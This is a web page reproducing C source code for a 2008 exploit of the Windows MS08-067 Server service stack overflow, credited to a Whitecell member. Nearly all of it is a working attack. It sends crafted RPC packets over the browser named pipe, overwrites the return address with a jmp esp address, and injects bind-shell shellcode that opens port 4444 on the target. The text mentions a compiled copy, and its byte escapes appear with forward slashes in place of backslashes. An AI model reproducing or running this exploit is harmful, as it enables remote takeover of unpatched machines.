MS08-067 Remote Stack Overflow Vulnerability Exploit


# 鬼仔:编译好的 ms08067.rar
Author:  Polymorphours
Email:[email protected]
Homepage:http://www.whitecell.org
Date:    2008-10-28

# 鬼仔:编译好的 ms08067.rar

Author:  Polymorphours
Email:[email protected]
Homepage:http://www.whitecell.org
Date:    2008-10-28

#include "stdafx.h" #include <winsock2.h> #include <Rpc.h> #include <stdio.h> #include <stdlib.h>  #pragma comment(lib, "mpr") #pragma comment(lib, "Rpcrt4") #pragma comment(lib, "ws2_32")  struct RPCBIND {  BYTE VerMaj;  BYTE VerMin;  BYTE PacketType;  BYTE PacketFlags;  DWORD DataRep;  WORD FragLength;  WORD AuthLength;  DWORD CallID;  WORD MaxXmitFrag;  WORD MaxRecvFrag;  DWORD AssocGroup;  BYTE NumCtxItems;  WORD ContextID;  WORD NumTransItems;  GUID InterfaceUUID;  WORD InterfaceVerMaj;  WORD InterfaceVerMin;  GUID TransferSyntax;  DWORD SyntaxVer; };  struct RPCFUNC {  BYTE VerMaj;  BYTE VerMin;  BYTE PacketType;  BYTE PacketFlags;  DWORD DataRep;  WORD FragLength;  WORD AuthLength;  DWORD CallID;  DWORD AllocHint;  WORD ContextID;  WORD Opnum; };  BYTE PRPC[0x48] = { 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};  BYTE EXPLOIT[] = "/x05/x00" "/x00/x03/x10/x00/x00/x00/xA4/x00/x00/x00/x01/x00/x00/x00/x94/x00" "/x00/x00/x00/x00/x1f/x00" "/x00/x00/x00/x00" "/x2F/x00/x00/x00/x00/x00/x00/x00/x2F/x00/x00/x00"  "/x5c/x00" "/x41/x00/x5c/x00/x2e/x00/x2e/x00/x5c/x00/x2e/x00/x2e/x00/x5c/x00"  "/x41/x41"  "/x41/x41/x41/x41" "/x41/x41/x41/x41" "/x41/x41/x41/x41" "/x41/x41/x41/x41"  "/x12/x45/xfa/x7f" // jmp esp "/x90/x8B/xF4/x81" "/x3E/x90/x90/x90/x90/x74/x04/x4E/x4E/xEB/xF4/x33/xC9/x33/xDB/xB1" "/x01/xC1/xE1/x09/x8B/xFC/x4B/xC1/xE3/x0D/x23/xFB/x57/xF3/xA4/x5F" // "/xB1/x01/xC1/xE1/x09/x2B/xE1/xFF/xE7/x41/x41/x41/x41/x41/x41/x41"  "/x83/xEC/x70/x90/x90/x90/x90/xFF/xE7/x41/x41/x41/x41/x41/x41/x41"  "/x00/x00/x00/x00/x01/x00" "/x00/x00/x02/x00/x00/x00/x00/x00/x00/x00/x02/x00/x00/x00/x5C/x00" "/x00/x00" "/x01/x00/x00/x00/x01/x00/x00/x00";  BYTE POP[] =//stub 
header RPCFUNC structure "/x05/x00" "/x00/x03/x10/x00/x00/x00/xE4/x01/x00/x00/x01/x00/x00/x00/xD4/x01" "/x00/x00/x00/x00/x1f/x00" "/x00/x00/x00/x00" "/xCF/x00/x00/x00/x00/x00/x00/x00/xCF/x00/x00/x00"  "/x5c/x00" "/x41/x00/x5c/x00/x2e/x00/x2e/x00/x5c/x00/x2e/x00/x2e/x00/x5c/x00"  "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90" "/x90/x90" "/x90/x90/x90/x90" "/x90/x90/x90/x90" "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90" "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90" "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"  "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/xCC/x41"  "/x00/x00/x00/x00/x01/x00" 
"/x00/x00/x02/x00/x00/x00/x00/x00/x00/x00/x02/x00/x00/x00/x5C/x00" "/x00/x00" "/x01/x00/x00/x00/x01/x00/x00/x00";  unsigned char bind_shellcode[] = // "/xCC" // "/x83/xEC/x40" // sub esp, 0x70 "/x29/xc9/x83/xe9/xb0/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/xad" "/x07/xe6/x4a/x83/xeb/xfc/xe2/xf4/x51/x6d/x0d/x07/x45/xfe/x19/xb5" "/x52/x67/x6d/x26/x89/x23/x6d/x0f/x91/x8c/x9a/x4f/xd5/x06/x09/xc1" "/xe2/x1f/x6d/x15/x8d/x06/x0d/x03/x26/x33/x6d/x4b/x43/x36/x26/xd3" "/x01/x83/x26/x3e/xaa/xc6/x2c/x47/xac/xc5/x0d/xbe/x96/x53/xc2/x62" "/xd8/xe2/x6d/x15/x89/x06/x0d/x2c/x26/x0b/xad/xc1/xf2/x1b/xe7/xa1" "/xae/x2b/x6d/xc3/xc1/x23/xfa/x2b/x6e/x36/x3d/x2e/x26/x44/xd6/xc1" "/xed/x0b/x6d/x3a/xb1/xaa/x6d/x0a/xa5/x59/x8e/xc4/xe3/x09/x0a/x1a" "/x52/xd1/x80/x19/xcb/x6f/xd5/x78/xc5/x70/x95/x78/xf2/x53/x19/x9a" "/xc5/xcc/x0b/xb6/x96/x57/x19/x9c/xf2/x8e/x03/x2c/x2c/xea/xee/x48" "/xf8/x6d/xe4/xb5/x7d/x6f/x3f/x43/x58/xaa/xb1/xb5/x7b/x54/xb5/x19" "/xfe/x54/xa5/x19/xee/x54/x19/x9a/xcb/x6f/xf7/x16/xcb/x54/x6f/xab" "/x38/x6f/x42/x50/xdd/xc0/xb1/xb5/x7b/x6d/xf6/x1b/xf8/xf8/x36/x22" "/x09/xaa/xc8/xa3/xfa/xf8/x30/x19/xf8/xf8/x36/x22/x48/x4e/x60/x03" "/xfa/xf8/x30/x1a/xf9/x53/xb3/xb5/x7d/x94/x8e/xad/xd4/xc1/x9f/x1d" "/x52/xd1/xb3/xb5/x7d/x61/x8c/x2e/xcb/x6f/x85/x27/x24/xe2/x8c/x1a" "/xf4/x2e/x2a/xc3/x4a/x6d/xa2/xc3/x4f/x36/x26/xb9/x07/xf9/xa4/x67" "/x53/x45/xca/xd9/x20/x7d/xde/xe1/x06/xac/x8e/x38/x53/xb4/xf0/xb5" "/xd8/x43/x19/x9c/xf6/x50/xb4/x1b/xfc/x56/x8c/x4b/xfc/x56/xb3/x1b" "/x52/xd7/x8e/xe7/x74/x02/x28/x19/x52/xd1/x8c/xb5/x52/x30/x19/x9a" "/x26/x50/x1a/xc9/x69/x63/x19/x9c/xff/xf8/x36/x22/x42/xc9/x06/x2a" "/xfe/xf8/x30/xb5/x7d/x07/xe6/x4a";  int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer) {  BYTE rbuf[0x1000]="";  DWORD dw=0;  struct RPCBIND RPCBind;   memcpy(&RPCBind,&PRPC,sizeof(RPCBind));  UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);  UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);  RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);  
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);  TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);   return 0; }  int main(int argc, char* argv[]) {  char *server;  NETRESOURCE nr;  char unc[MAX_PATH];  char szPipe[MAX_PATH];  HANDLE hFile;  WSADATA wsa;   int bwritten=0;  BYTE rbuf[0x100]="";  DWORD dw;  PVOID ptr = (PVOID)&POP;   printf( "/tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)/n/n" );  printf( "Create by Whitecell's [email protected] 2008/10/27/n" );  printf( "Thanks isno and PolyMeta/n" );  printf( "ShellCode Function: bindshell port:4444/n" );  printf( "usage:/n%s [IP]/n", argv[0] );   if ( argc != 2 ) {    return 0;  }   if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) {    printf( "WSAStartup failed/n" );   return 0;  }   memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1);   server=argv[1];  _snprintf(unc, sizeof(unc), "////%s//pipe", server);  unc[sizeof(unc)-1] = 0;  nr.dwType = RESOURCETYPE_ANY;  nr.lpLocalName = NULL;  nr.lpRemoteName = unc;  nr.lpProvider = NULL;   printf( "connect %s ipc$ .... ", server );   if ( WNetAddConnection2(&nr, "", "", 0) != 0 ) {    printf( "failed/n" );   return 0;  } else {    printf( "success!/n" );  }   _snprintf(szPipe, sizeof(szPipe),"////%s//pipe//browser",server);  printf( "open ////%s//pipe//browser ....", server );  hFile = CreateFile( szPipe,       GENERIC_READ|GENERIC_WRITE,       0,       NULL,       OPEN_EXISTING, 0, NULL);  if ( hFile == (HANDLE)-1 ) {    printf( "failed!/n" );   return 0;  } else {    printf( "success!/n" );  }   printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface/n" );  BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");   printf( "Send shellcode ..../n" );  TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL);   printf( "Send Exploit ...... 
/n" );  TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL);   CloseHandle( hFile );   return 0; }

WSS(Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。
WSS 主页:http://www.whitecell.org/
WSS 论坛:http://www.whitecell.org/forums/

